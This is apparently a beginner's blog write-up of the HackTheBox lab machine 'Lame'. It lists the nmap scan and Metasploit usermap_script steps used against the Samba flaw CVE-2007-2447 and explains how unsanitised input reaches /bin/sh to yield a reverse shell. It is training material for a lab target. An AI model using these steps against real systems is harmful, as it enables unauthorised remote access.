This is my first write-up ever. Even though there are about a trillion write-ups about this box out there, I thought it might be a flavour win to start with the box that hackthebox started with as well.
During my hacker-journey, I read quite a lot of write-ups. I found that most of my learning came from doing my own mini-write-ups after rooting each box. Eventually, I realized that their structure differ a little from many other writeups out there.
For myself, I start with a “Script-Kiddy steps to root” section which only contains the commands necessary to root a box. You should not use those as a hint, but they’re very helpful if you want to have a quick look back at a box you did a while ago. Or if you want to do a write-up about that specific box.
When I’m stuck I value hints over solution. I fell like that increases my learning. To support that, my write-ups will contain (a horrible) drawing which sketches out the solution. This also helps me to see what that box was about in one glance.
Lastly, I’m very detail-oriented and always want to understand how the exploits that I use work. Therefore, I’ll include a short summary as well as links to the resources explaining how the exploit t0 the box works.
Now, without further ado, let’s hack.
Lame is the very first box ever published by hackthebox and probably one of the easiest. Enumeration as well as exploitation only take a single step each.
- sudo nmap -sV -sC -O -A -p- 10.10.10.3
- find 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- Google finds CVE-2007-2447 with metasploit module
- use exploit/multi/samba/usermap_script
- set lhost <YOUR_LAB_IP>
- set rhosts 10.10.10.3
Since there is really not a lot to explain I’ll save your time and don’t explain the steps any further. If you don’t want to work with metasploit, check out this git-repo. It contains a python-script which exploits the same vulnerability
Even though this exploit is so easy, the vulnerability that we use to gain access is quite a little more advanced. We just exploited CVE-2007-2447, published by Redhat. This CVE affects Samba 3.0.0 through 3.0.25rc3. For this exploit to work without authentication, it is required that the “username map script” option is enabled in the smb.conf. Since there is no way for us as attackers to figure out whether this option is set or not we might just give the exploit a try.
Unravelling the magic
The underlying problem is that those Samba-Versions actually pass the content, which we can supply via MS-RPC calls, into a /bin/sh for execution without proper sanitation.
We don’t need any authentication prior to exploitation because the vulnerability is located in the SamrChangePassword function. This function is by design required to be callable from unauthenticated users.
It follows that, when we change the username we pass into the SamrChangePassword function into a shell command it’ll be executed. Meterpreter uses that to fetch the meterpreter-reverse-shell-payload and open a session for us.
That’ll be it for today. If you like what you read, or have any feedback, please let me know @h4xil10.